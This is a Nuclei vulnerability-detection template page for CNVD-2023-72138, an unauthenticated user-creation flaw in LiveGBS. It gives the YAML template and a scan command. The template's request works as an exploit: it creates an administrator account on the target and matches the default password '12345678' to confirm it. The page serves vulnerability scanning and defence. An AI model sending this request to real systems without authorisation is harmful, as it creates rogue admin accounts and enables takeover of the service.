LiveGBS user/save - Logical Flaw

ID: CNVD-2023-72138

Severity: high

Author: pussycat0x

Tags: cnvd,cnvd2023,livegbs,info-leak

Description

There is a logic defect vulnerability in LiveGBS user/save. Unauthenticated attackers can exploit this vulnerability to arbitrarily add users, resulting in the takeover of background services and causing adverse effects such as information leakage.

YAML Source

id: CNVD-2023-72138

info:
  name: LiveGBS user/save - Logical Flaw
  author: pussycat0x
  severity: high
  description: |
    There is a logic defect vulnerability in LiveGBS user/save. Unauthenticated attackers can exploit this vulnerability to arbitrarily add users, resulting in the takeover of background services and causing adverse effects such as information leakage.
  reference:
    - https://github.com/wy876/POC/blob/main/LiveGBS%E5%AD%98%E5%9C%A8%E9%80%BB%E8%BE%91%E7%BC%BA%E9%99%B7%E6%BC%8F%E6%B4%9E(CNVD-2023-72138).md
  metadata:
    max-request: 1
    verified: true
    fofa-query: icon_hash="-206100324"
  tags: cnvd,cnvd2023,livegbs,info-leak

variables:
  user: "{{to_lower(rand_base(5))}}"

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/v1/user/save?ID=&Username={{user}}&Role=管理员&Enable=true"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"DefaultUserPassword": "12345678"'
          - 'ID'
        condition: and

      - type: word
        part: content_type
        words:
          - 'application/json'

      - type: status
        status:
          - 200
# digest: 490a004630440220104c113066669ce64cf6d7f8aa081123483110f93330c4acc86207da2f44626d02203bea7dde709c163267bafe95ab2827eadf8e155ceb6b878a941521a8ef0f91b6:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cnvd/2023/CNVD-2023-72138.yaml"

View on Github